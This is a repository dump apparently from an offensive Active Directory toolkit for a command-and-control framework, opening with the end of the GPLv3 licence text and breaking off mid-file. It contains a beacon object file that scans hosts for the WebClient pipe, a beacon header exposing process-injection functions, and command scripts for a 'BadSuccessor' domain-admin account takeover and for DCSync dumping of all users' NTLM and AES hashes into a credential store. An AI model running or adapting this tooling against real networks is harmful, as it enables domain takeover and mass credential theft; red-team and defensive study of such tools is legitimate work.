implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

  The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work.  For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

  The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

  The Corresponding Source for a work in source code form is that
same work.

  2. Basic Permissions.

  All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

  You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

  Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary.

  3. Protecting Users' Legal Rights From Anti-Circumvention Law.

  No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.

  When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.

  4. Conveying Verbatim Copies.

  You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.

  You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.

  5. Conveying Modified Source Versions.

  You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:

    a) The work must carry prominent notices stating that you modified
    it, and giving a relevant date.

    b) The work must carry prominent notices stating that it is
    released under this License and any conditions added under section
    7.  This requirement modifies the requirement in section 4 to
    "keep intact all notices".

    c) You must license the entire work, as a whole, under this
    License to anyone who comes into possession of a copy.  This
    License will therefore apply, along with any applicable section 7
    additional terms, to the whole of the work, and all its parts,
    regardless of how they are packaged.  This License gives no
    permission to license the work in any other way, but it does not
    invalidate such permission if you have separately received it.

    d) If the work has interactive user interfaces, each must display
    Appropriate Legal Notices; however, if the Program has interactive
    interfaces that do not display Appropriate Legal Notices, your
    work need not make them do so.

  A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit.  Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.

  6. Conveying Non-Source Forms.

  You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:

    a) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by the
    Corresponding Source fixed on a durable physical medium
    customarily used for software interchange.

    b) Convey the object code in, or embodied in, a physical product
    (including a physical distribution medium), accompanied by a
    written offer, valid for at least three years and valid for as
    long as you offer spare parts or customer support for that product
    model, to give anyone who possesses the object code either (1) a
    copy of the Corresponding Source for all the software in the
    product that is covered by this License, on a durable physical
    medium customarily used for software interchange, for a price no
    more than your reasonable cost of physically performing this
    conveying of source, or (2) access to copy the
    Corresponding Source from a network server at no charge.

    c) Convey individual copies of the object code with a copy of the
    written offer to provide the Corresponding Source.  This
    alternative is allowed only occasionally and noncommercially, and
    only if you received the object code with such an offer, in accord
    with subsection 6b.

    d) Convey the object code by offering access from a designated
    place (gratis or for a charge), and offer equivalent access to the
    Corresponding Source in the same way through the same place at no
    further charge.  You need not require recipients to copy the
    Corresponding Source along with the object code.  If the place to
    copy the object code is a network server, the Corresponding Source
    may be on a different server (operated by you or a third party)
    that supports equivalent copying facilities, provided you maintain
    clear directions next to the object code saying where to find the
    Corresponding Source.  Regardless of what server hosts the
    Corresponding Source, you remain obligated to ensure that it is
    available for as long as needed to satisfy these requirements.

    e) Convey the object code using peer-to-peer transmission, provided
    you inform other peers where the object code and Corresponding
    Source of the work are being offered to the general public at no
    charge under subsection 6d.

  A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.

  A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling.  In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage.  For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product.  A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.

  "Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source.  The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.

  If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information.  But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).

  The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed.  Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.

  Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.

  7. Additional Terms.

  "Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law.  If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.

  When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it.  (Additional permissions may be written to require their own
removal in certain cases when you modify the work.)  You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.

  Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:

    a) Disclaiming warranty or limiting liability differently from the
    terms of sections 15 and 16 of this License; or

    b) Requiring preservation of specified reasonable legal notices or
    author attributions in that material or in the Appropriate Legal
    Notices displayed by works containing it; or

    c) Prohibiting misrepresentation of the origin of that material, or
    requiring that modified versions of such material be marked in
    reasonable ways as different from the original version; or

    d) Limiting the use for publicity purposes of names of licensors or
    authors of the material; or

    e) Declining to grant rights under trademark law for use of some
    trade names, trademarks, or service marks; or

    f) Requiring indemnification of licensors and authors of that
    material by anyone who conveys the material (or modified versions of
    it) with contractual assumptions of liability to the recipient, for
    any liability that these contractual assumptions directly impose on
    those licensors and authors.

  All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10.  If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term.  If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.

  If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.

  Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.

  8. Termination.

  You may not propagate or modify a covered work except as expressly
provided under this License.  Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).

  However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.

  Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.

  Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License.  If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.

  9. Acceptance Not Required for Having Copies.

  You are not required to accept this License in order to receive or
run a copy of the Program.  Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance.  However,
nothing other than this License grants you permission to propagate or
modify any covered work.  These actions infringe copyright if you do
not accept this License.  Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.

  10. Automatic Licensing of Downstream Recipients.

  Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License.  You are not responsible
for enforcing compliance by third parties with this License.

  An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations.  If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.

  You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License.  For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.

  11. Patents.

  A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based.  The
work thus licensed is called the contributor's "contributor version".

  A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version.  For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.

  Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.

  In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement).  To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.

  If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients.  "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.

  If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.

  A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License.  You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.

  Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.

  12. No Surrender of Others' Freedom.

  If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License.  If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all.  For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.

  13. Use with the GNU Affero General Public License.

  Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work.  The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.

  14. Revised Versions of this License.

  The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time.  Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.

  Each version is given a distinguishing version number.  If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation.  If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.

  If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.

  Later license versions may give you additional or different
permissions.  However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.

  15. Disclaimer of Warranty.

  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

  16. Limitation of Liability.

  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.

  17. Interpretation of Sections 15 and 16.

  If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.

                     END OF TERMS AND CONDITIONS

            How to Apply These Terms to Your New Programs

  If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.

  To do so, attach the following notices to the program.  It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.

    <one line to give the program's name and a brief idea of what it does.>
    Copyright (C) <year>  <name of author>

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <https://www.gnu.org/licenses/>.

Also add information on how to contact you by electronic and paper mail.

  If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:

    <program>  Copyright (C) <year>  <name of author>
    This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
    This is free software, and you are welcome to redistribute it
    under certain conditions; type `show c' for details.

The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License.  Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".

  You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.

  The GNU General Public License does not permit incorporating your program
into proprietary programs.  If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library.  If this is what you want to do, use the GNU Lesser General
Public License instead of this License.  But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.


================================================
FILE: AD-BOF/WebDAVClient/StatusWebDAVClient.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"

WINBASEAPI BOOL WINAPI KERNEL32$WaitNamedPipeA(LPCSTR lpNamedPipeName, DWORD nTimeOut);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str);
WINBASEAPI void* WINAPI MSVCRT$strcpy(const char* dest, const char* source);
WINBASEAPI void* WINAPI MSVCRT$strcat(const char* dest, const char* source);
WINBASEAPI void* WINAPI MSVCRT$strtok(char* str, const char* delim);
WINBASEAPI void* WINAPI MSVCRT$free(void*);

void go(char* args, int length)
{
    datap parser;
    BeaconDataParse(&parser, args, length);

    char* hosts = (char*)BeaconDataExtract(&parser, NULL);

    char* pipeNameHead = "\\\\";
    char* pipeNameTail = "\\pipe\\DAV RPC SERVICE";
    BOOL pipeStatus = 0;
    char* singleHost = MSVCRT$strtok(hosts, ",");

    while (singleHost != NULL)
    {
        char* fullPipeName = MSVCRT$malloc(MSVCRT$strlen(singleHost) + MSVCRT$strlen(pipeNameHead) + MSVCRT$strlen(pipeNameTail) + 1);
        MSVCRT$strcpy(fullPipeName, pipeNameHead);
        MSVCRT$strcat(fullPipeName, singleHost);
        MSVCRT$strcat(fullPipeName, pipeNameTail);
        pipeStatus = KERNEL32$WaitNamedPipeA(fullPipeName, 3000);
        if (pipeStatus == 0)
            BeaconPrintf(CALLBACK_OUTPUT, "[x] Unable to hit DAV pipe on %s, system is either unreachable or does not have WebClient service running", singleHost);
        else
            BeaconPrintf(CALLBACK_OUTPUT, "[+] WebClient service is active on %s", singleHost);
        MSVCRT$free((void*)fullPipeName);
        singleHost = MSVCRT$strtok(NULL, ",");
    }
}

================================================
FILE: AD-BOF/WebDAVClient/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 */

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d

DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

================================================
FILE: AD-BOF/ad-services.axs
================================================
var metadata = {
    name: "",
    description: "",
    nosave: true
};

var path = ax.script_dir();
ax.script_load(path + "ADCS-BOF/ADCS.axs")
ax.script_load(path + "Kerbeus-BOF/kerbeus.axs")
ax.script_load(path + "SQL-BOF/SQL.axs")
ax.script_load(path + "LDAP-BOF/LDAP.axs")
ax.script_load(path + "RelayInformer/RelayInformer.axs")

================================================
FILE: AD-BOF/ad.axs
================================================
var metadata = {
    name: "AD-BOF",
    description: "Active Directory Exploitation BOFs"
};



var cmd_adwssearch = ax.create_command("adwssearch", "Executes ADWS query", "adwssearch (objectClass=*) -attributes *,ntsecuritydescriptor --dc DC1");
cmd_adwssearch.addArgString("query", true);
cmd_adwssearch.addArgFlagString( "-a", "attributes", "Comma-separated attributes to retrieve (default: all attributes)", "");
cmd_adwssearch.addArgFlagString( "--dc", "dc", "Target domain controller (e.g., 'dc01.domain.local'). If omitted, auto-discovers DC.", "");
cmd_adwssearch.addArgFlagString( "--dn", "dn", "Custom base DN (e.g., 'DC=domain,DC=local'). If not specified, auto-derives from user context or target.", "");
cmd_adwssearch.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let query      = parsed_json["query"];
    let attributes = parsed_json["attributes"];
    let dc         = parsed_json["dc"];
    let dn         = parsed_json["dn"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr", [query, attributes, dc, dn]);
    let bof_path = ax.script_dir() + "_bin/adws_search." + ax.arch(id) + ".o";
    let message = "BOF implementation: adws search";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});





var cmd_badtakeover = ax.create_command("badtakeover", "BOF for performing account takeover using the BadSuccessor technique", "badtakeover \"OU=TestOU,DC=domain,DC=dom\" attacker_dmsa S-1-5-21-....-1104 \"CN=domainadmin,CN=Users,DC=domain,DC=dom\" domain.dom");
cmd_badtakeover.addArgString("ou",      true, "Target OU to write the malicious dMSA");
cmd_badtakeover.addArgString("account", true, "The name of the new dMSA to create");
cmd_badtakeover.addArgString("sid",     true, "The Security ID (SID) of your current context");
cmd_badtakeover.addArgString("dn",      true, "The target user objects DN");
cmd_badtakeover.addArgString("domain",  true, "The current domain");
cmd_badtakeover.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let ou      = parsed_json["ou"];
    let account = parsed_json["account"];
    let sid     = parsed_json["sid"];
    let dn      = parsed_json["dn"];
    let domain  = parsed_json["domain"];

    let bof_params = ax.bof_pack("cstr,cstr,cstr,cstr,cstr", [ou, account, sid, dn, domain]);
    let bof_path = ax.script_dir() + "_bin/badtakeover." + ax.arch(id) + ".o";
    let message = "Exploiting BadSuccessor...";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});





let dcsync_handler = function (task) {
    const lines = task.text.split(/\r?\n/);
    const results = [];
    let dc = "";
    let currentName = null;
    let currentObjectType = null;

    const reDC = /^\[\*\]\s+Discovered DC:\s+(.+)$/;
    const reObject = /^\[\*\]\s+(User|Computer|Trust account|Object):\s+(.+)$/;
    const reNT = /^nt:\s*([0-9a-f]{32})$/;
    const reAES256 = /^aes256:\s*([0-9a-f]{64})$/;
    const reAES128 = /^aes128:\s*([0-9a-f]{32})$/;

    function parseName(rawName) {
        const idx = rawName.indexOf("\\");
        if (idx === -1) return { name: rawName, realm: null };
        return {
            name: rawName.slice(idx + 1),
            realm: rawName.slice(0, idx)
        };
    }

    function pushHash(hashType, hashValue) {
        if (!currentName || !hashValue) return;

        const nameParts = parseName(currentName);
        const tag = currentObjectType === "Computer" ? "computer" : "";

        results.push({
            username: nameParts.name,
            type: hashType,
            password: hashValue,
            storage: "dcsync",
            tag: tag,
            realm: nameParts.realm,
            host: dc
        });
    }

    for (const line of lines) {
        if (results.length > 1000) {
            ax.credentials_add_list(results);
            results.length = 0;
        }

        const trimmed = line.trim();
        if (!trimmed) continue;

        let m = reDC.exec(trimmed);
        if (m && !dc) { dc = m[1]; continue; }

        m = reObject.exec(trimmed);
        if (m) {
            currentObjectType = m[1];
            currentName = m[2];
            continue;
        }

        if (!currentName) continue;

        m = reNT.exec(trimmed);
        if (m) { pushHash("ntlm", m[1]); continue; }

        m = reAES256.exec(trimmed);
        if (m) { pushHash("aes256", m[1]); continue; }

        m = reAES128.exec(trimmed);
        if (m) pushHash("aes128", m[1]);
    }

    if (results.length) ax.credentials_add_list(results);
};

var _cmd_dcsync_single = ax.create_command( "single", "Perform a DCSync operation on a single user", "dcsync single jane.doe -dc dc01.corp.local --ldaps" );
_cmd_dcsync_single.addArgString("target", true, "Target username or distinguished name");
_cmd_dcsync_single.addArgFlagString("-ou", "ou_path", false, "OU path to search (optional)");
_cmd_dcsync_single.addArgFlagString("-dc", "dc_address", false, "Domain Controller address");
_cmd_dcsync_single.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_dcsync_single.addArgBool("--only-nt", "Only ntlm hashes");
_cmd_dcsync_single.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){

    function identifyInputType(input) {
        const usernameRegex = /^[a-zA-Z0-9._-]{1,64}$/;
        const dnRegex = /^(?:[A-Z]+=[^,]+)(?:,(?:[A-Z]+=[^,]+))*$/i;
        if (dnRegex.test(input)) {
            return 1;
        } else if (usernameRegex.test(input)) {
            return 0;
        } else {
            return 0;
        }
    }

    let target = parsed_json["target"];
    let is_dn = identifyInputType(target);
    let ou_path = parsed_json["ou_path"] || "";
    let dc_address = parsed_json["dc_address"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let only_nt = parsed_json["--only-nt"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,int,cstr,cstr,int,int", [target, is_dn, ou_path, dc_address, use_ldaps, only_nt]);
    let bof_path = ax.script_dir() + "_bin/dcsync-single." + ax.arch(id) + ".o";
    ax.execute_alias_handler(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, `DCSyncing user ${target}...`, dcsync_handler);
});

var _cmd_dcsync_all = ax.create_command( "all", "Perform DCSync operations for all users in the domain", "dcsync all -ou 'OU=Users,DC=corp,DC=local' -dc dc01.corp.local --ldaps" );
_cmd_dcsync_all.addArgFlagString("-ou", "ou_path", false, "OU path to search (optional)");
_cmd_dcsync_all.addArgFlagString("-dc", "dc_address", false, "Domain Controller address");
_cmd_dcsync_all.addArgBool("--ldaps", "Use LDAPS (port 636)");
_cmd_dcsync_all.addArgBool("--only-nt", "Only ntlm hashes");
_cmd_dcsync_all.addArgBool("--only-users", "Only User and Trust accounts");
_cmd_dcsync_all.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines){
    let ou_path = parsed_json["ou_path"] || "";
    let dc_address = parsed_json["dc_address"] || "";
    let use_ldaps = parsed_json["--ldaps"] ? 1 : 0;
    let only_nt = parsed_json["--only-nt"] ? 1 : 0;
    let only_users = parsed_json["--only-users"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,cstr,int,int,int", [ou_path, dc_address, use_ldaps, only_nt, only_users]);
    let bof_path = ax.script_dir() + "_bin/dcsync-all." + ax.arch(id) + ".o";
